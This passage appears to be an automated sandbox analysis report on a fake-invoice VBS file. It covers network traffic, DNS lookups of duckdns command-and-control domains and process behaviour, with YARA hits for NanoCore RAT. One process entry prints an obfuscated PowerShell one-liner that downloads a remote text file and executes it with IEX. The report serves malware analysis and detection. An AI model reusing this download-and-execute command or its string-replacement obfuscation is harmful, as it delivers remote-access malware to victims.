                                                                            Aug 3, 2021 20:39:39.695035934 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.696613073 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.877999067 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.878031015 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.880145073 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.060410023 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060575008 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060605049 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060636997 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060669899 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060672045 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.060724974 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060739994 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.060796976 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060822964 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060854912 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060884953 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060909986 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060930967 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060929060 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.060951948 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.060956001 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.061290979 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241018057 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241045952 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241059065 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241075039 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241091013 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241106987 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241118908 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241142988 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241161108 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241177082 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241195917 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241214037 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241221905 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241230011 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241245985 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241246939 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241250038 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241252899 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241264105 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241272926 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241281033 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241318941 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241337061 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241358995 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241360903 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241377115 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241386890 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241425037 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241441011 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241457939 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241461039 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241472960 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241487980 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.241502047 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.241545916 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:40.421477079 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:40.421519995 CEST44349756207.241.228.148192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Aug 3, 2021 20:39:02.850114107 CEST5309753192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:02.884232044 CEST53530978.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:04.121026039 CEST4925753192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:04.157704115 CEST53492578.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:04.335817099 CEST6238953192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:04.369837999 CEST53623898.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:05.176708937 CEST4991053192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:05.201320887 CEST53499108.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:06.523617029 CEST5585453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:06.550964117 CEST53558548.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:07.846718073 CEST6454953192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:07.874366045 CEST53645498.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:09.027025938 CEST6315353192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:09.062658072 CEST53631538.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:10.253014088 CEST5299153192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:10.285778999 CEST53529918.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:11.707073927 CEST5370053192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:11.733701944 CEST53537008.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:13.112313032 CEST5172653192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:13.145096064 CEST53517268.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:14.161216021 CEST5679453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:14.188775063 CEST53567948.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:15.038754940 CEST5653453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:15.071434975 CEST53565348.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:15.941731930 CEST5662753192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:15.974540949 CEST53566278.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:16.065934896 CEST5662153192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:16.090558052 CEST53566218.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:17.267803907 CEST6311653192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:17.295295954 CEST53631168.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:18.492222071 CEST6407853192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:18.519809008 CEST53640788.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:19.373274088 CEST6480153192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:19.398221016 CEST53648018.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:20.742938995 CEST6172153192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:20.770781994 CEST53617218.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:21.854343891 CEST5125553192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:21.879256010 CEST53512558.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:22.926369905 CEST6152253192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:22.953879118 CEST53615228.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:35.208514929 CEST5233753192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:35.244277954 CEST53523378.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:39.292776108 CEST5504653192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:39.330821991 CEST53550468.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:53.083746910 CEST4961253192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:53.138139009 CEST53496128.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:53.713172913 CEST4928553192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:53.751728058 CEST53492858.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:54.465384960 CEST5060153192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:54.497786999 CEST53506018.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:55.000854015 CEST6087553192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:55.033651114 CEST53608758.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:55.566145897 CEST5644853192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:55.598603964 CEST53564488.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:55.705892086 CEST5917253192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:55.733374119 CEST53591728.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:56.324378967 CEST6242053192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:56.356928110 CEST53624208.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:56.813699007 CEST6057953192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:56.847265005 CEST53605798.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:58.230417967 CEST5018353192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:58.268604994 CEST53501838.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:39:59.858330011 CEST6153153192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:39:59.893903017 CEST53615318.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:40:00.575088978 CEST4922853192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:40:00.609905958 CEST53492288.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:40:01.035936117 CEST5979453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:40:01.061100006 CEST53597948.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:40:11.122783899 CEST5591653192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:40:11.159787893 CEST53559168.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:40:46.455075979 CEST5275253192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:40:46.487801075 CEST53527528.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:40:50.338409901 CEST6054253192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:40:50.371400118 CEST53605428.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:41:48.610855103 CEST6068953192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:41:48.751724005 CEST53606898.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:41:55.443265915 CEST6420653192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:41:55.571132898 CEST53642068.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:02.624257088 CEST5090453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:02.657927990 CEST53509048.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:09.395072937 CEST5752553192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:09.430355072 CEST53575258.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:16.328212023 CEST5381453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:16.363449097 CEST53538148.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:23.406879902 CEST5341853192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:23.439666986 CEST53534188.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:30.407226086 CEST6283353192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:30.439749002 CEST53628338.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:38.310401917 CEST5926053192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:38.345422983 CEST53592608.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:45.546369076 CEST4994453192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:45.580141068 CEST53499448.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:52.505614042 CEST6330053192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:52.634674072 CEST53633008.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:42:59.561860085 CEST6144953192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:42:59.691026926 CEST53614498.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:43:06.619920969 CEST5127553192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:43:06.655194998 CEST53512758.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:43:12.629626989 CEST6349253192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:43:12.760323048 CEST53634928.8.8.8192.168.2.4
                                                                            Aug 3, 2021 20:43:12.834378958 CEST5894553192.168.2.48.8.8.8
                                                                            Aug 3, 2021 20:43:12.868308067 CEST53589458.8.8.8192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Aug 3, 2021 20:39:15.941731930 CEST192.168.2.48.8.8.80x7bbeStandard query (0)ia601405.us.archive.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:39:39.292776108 CEST192.168.2.48.8.8.80xbe89Standard query (0)ia801408.us.archive.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:41:48.610855103 CEST192.168.2.48.8.8.80xa4b4Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:41:55.443265915 CEST192.168.2.48.8.8.80x4f8dStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:02.624257088 CEST192.168.2.48.8.8.80x811fStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:09.395072937 CEST192.168.2.48.8.8.80xc9faStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:16.328212023 CEST192.168.2.48.8.8.80x1b9eStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:23.406879902 CEST192.168.2.48.8.8.80xe0e7Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:30.407226086 CEST192.168.2.48.8.8.80xdf8bStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:38.310401917 CEST192.168.2.48.8.8.80x1427Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:45.546369076 CEST192.168.2.48.8.8.80xdec4Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:52.505614042 CEST192.168.2.48.8.8.80x813eStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:59.561860085 CEST192.168.2.48.8.8.80xb3b4Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:43:06.619920969 CEST192.168.2.48.8.8.80xd94dStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:43:12.629626989 CEST192.168.2.48.8.8.80xc508Standard query (0)dangomra.duckdns.orgA (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:43:12.834378958 CEST192.168.2.48.8.8.80x2379Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Aug 3, 2021 20:39:15.974540949 CEST8.8.8.8192.168.2.40x7bbeNo error (0)ia601405.us.archive.org207.241.227.125A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:39:39.330821991 CEST8.8.8.8192.168.2.40xbe89No error (0)ia801408.us.archive.org207.241.228.148A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:41:48.751724005 CEST8.8.8.8192.168.2.40xa4b4No error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:41:55.571132898 CEST8.8.8.8192.168.2.40x4f8dNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:02.657927990 CEST8.8.8.8192.168.2.40x811fNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:09.430355072 CEST8.8.8.8192.168.2.40xc9faNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:16.363449097 CEST8.8.8.8192.168.2.40x1b9eNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:23.439666986 CEST8.8.8.8192.168.2.40xe0e7No error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:30.439749002 CEST8.8.8.8192.168.2.40xdf8bNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:38.345422983 CEST8.8.8.8192.168.2.40x1427No error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:45.580141068 CEST8.8.8.8192.168.2.40xdec4No error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:52.634674072 CEST8.8.8.8192.168.2.40x813eNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:42:59.691026926 CEST8.8.8.8192.168.2.40xb3b4No error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:43:06.655194998 CEST8.8.8.8192.168.2.40xd94dNo error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:43:12.760323048 CEST8.8.8.8192.168.2.40xc508No error (0)dangomra.duckdns.org185.244.30.23A (IP address)IN (0x0001)
                                                                            Aug 3, 2021 20:43:12.868308067 CEST8.8.8.8192.168.2.40x2379No error (0)newjan.duckdns.org185.244.30.23A (IP address)IN (0x0001)

                                                                            HTTPS Packets

                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                            Aug 3, 2021 20:39:16.366322994 CEST207.241.227.125443192.168.2.449746CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                            CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                            CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                            OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                            Aug 3, 2021 20:39:39.694905043 CEST207.241.228.148443192.168.2.449756CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                            CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                            CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                            OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: wscript.exe PID: 6628 Parent PID: 3424

                                                                            General

                                                                            Start time:20:39:09
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs'
                                                                            Imagebase:0x7ff7cf0c0000
                                                                            File size:163840 bytes
                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.652005586.000002534BC55000.00000004.00000040.sdmp, Author: Florian Roth
                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.651067855.000002534BC5B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.652059892.000002534D420000.00000004.00000001.sdmp, Author: Florian Roth
                                                                            Reputation:high

                                                                            Analysis Process: powershell.exe PID: 6756 Parent PID: 6628

                                                                            General

                                                                            Start time:20:39:11
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
                                                                            Imagebase:0x7ff7bedd0000
                                                                            File size:447488 bytes
                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            Analysis Process: conhost.exe PID: 6772 Parent PID: 6756

                                                                            General

                                                                            Start time:20:39:11
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff724c50000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: aspnet_compiler.exe PID: 6900 Parent PID: 6756

                                                                            General

                                                                            Start time:20:41:43
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0x230000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Analysis Process: aspnet_compiler.exe PID: 7072 Parent PID: 6756

                                                                            General

                                                                            Start time:20:41:44
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0x4f0000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
